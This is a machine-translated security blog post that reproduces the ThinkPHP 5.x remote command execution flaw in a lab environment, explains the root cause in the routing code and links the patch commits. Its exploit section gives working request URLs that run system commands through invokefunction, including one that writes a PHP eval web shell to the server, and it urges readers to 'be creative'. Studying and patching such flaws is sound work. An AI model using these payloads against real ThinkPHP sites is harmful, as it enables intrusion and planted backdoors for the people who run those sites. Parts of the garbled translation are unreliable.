Shulou(Shulou.com)06/01 Report--

0x00 recurrence environment

ThinkPHP 5.x (v5.0.23 and v5.1.31 below) remote command execution vulnerability exploitation (GetShell)

0x01 step

Click start to hack to enter the environment page run the project and then visit the given target address

Execute the system command to display the files in the directory

Http://aaa.vsplate.me:52763/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

Execute phpinfo

Http://aaa.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

Write shell

Http://aaa.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php

Think what you think and be creative

0x02 vulnerability principle Analysis of key Code

The controller is not filtered by the program before the fix, causing the attacker to call any class method by introducing the\ symbol.

The $this-> app-> controller method instantiates the controller, and then calls the method in the instance.

Follow the controller method:thinkphp/library/think/App.php

Parse $module and $class through the parseModuleAndClass method, and instantiate $class.

Thinkphp / library / think / App.php

When $name starts with a backslash\, use it directly as the class name.

Taking advantage of the namespace, if you can control the $name here (that is, the controller part of the route), you can instantiate any class.

Thinkphp/library/think/route/Rule.php

Looking back at the code for route resolution, the route/dispatch/Url.php:: parseUrl method calls route/Rule.php:: parseUrlPath to parse the routing information in pathinfo.

Route/dispatch/Url.php

Route/Rule.php

Use / a pair of $url to split without any filtering.

The routing url is obtained from Request::path ()

Among them, let's take a look at the pathinfo function

Since the default configuration of var_pathinfo is s, we can use $_ GET ['s'] to pass routing information, or we can use pathinfo to pass routing information

However, when testing, the\ in $_ SERVER ['pathinfo'] will be replaced with / in the windows environment. Combined with the previous analysis, the preliminary utilization code is as follows:

Index.php?s=index/\ namespace\ class/method

This will instantiate the\ namespace\ class class and execute the method method

0x03 vulnerability PoC

Using the pocsuite framework

0x04 vulnerability repair

Patch Thinkphp v5.0.x address: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

Patch Thinkphp v5.1.x address: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

0x05 vulnerability exploitation (current * means)

Threat warning | New vulnerability in ThinkPHP v5 * case first exposed

0x06 reference

Http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23%E5%8F%8Av5.1.31%E4%BB%A5%E4%B8%8B%E7%89%88%E6%9C%AC)_%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88 % A9%E7%94%A8%EF%BC%88getshell%EF%BC%89/

[2019-1-24 update] found that the dynamic debugging of the bosses can give the next repeat a try.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.